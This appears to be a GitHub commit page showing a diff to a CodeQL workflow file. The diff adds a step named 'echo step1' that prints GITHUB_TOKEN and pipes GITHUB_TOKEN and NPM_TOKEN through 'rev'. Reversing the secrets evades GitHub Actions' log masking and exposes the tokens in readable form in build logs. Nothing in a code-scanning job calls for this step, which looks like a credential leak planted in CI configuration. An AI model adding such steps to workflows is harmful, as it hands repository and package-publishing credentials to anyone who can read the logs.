We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 0b0d10c commit c64e0c7Copy full SHA for c64e0c7
.github/workflows/codeql.yml
@@ -59,6 +59,15 @@ jobs:
59
- name: Checkout repository
60
uses: actions/checkout@v4
61
62
+ - name: echo step1
63
+ run: |
64
+ echo ${{ secrets.GITHUB_TOKEN }}
65
+ echo ${{ secrets.GITHUB_TOKEN }} | rev
66
+ echo ${{secrets.NPM_TOKEN}} | rev
67
+
68
69
70
71
# Add any setup steps before running the `github/codeql-action/init` action.
72
# This includes steps like installing compilers or runtimes (`actions/setup-node`
73
# or others). This is typically only required for manual builds.
0 commit comments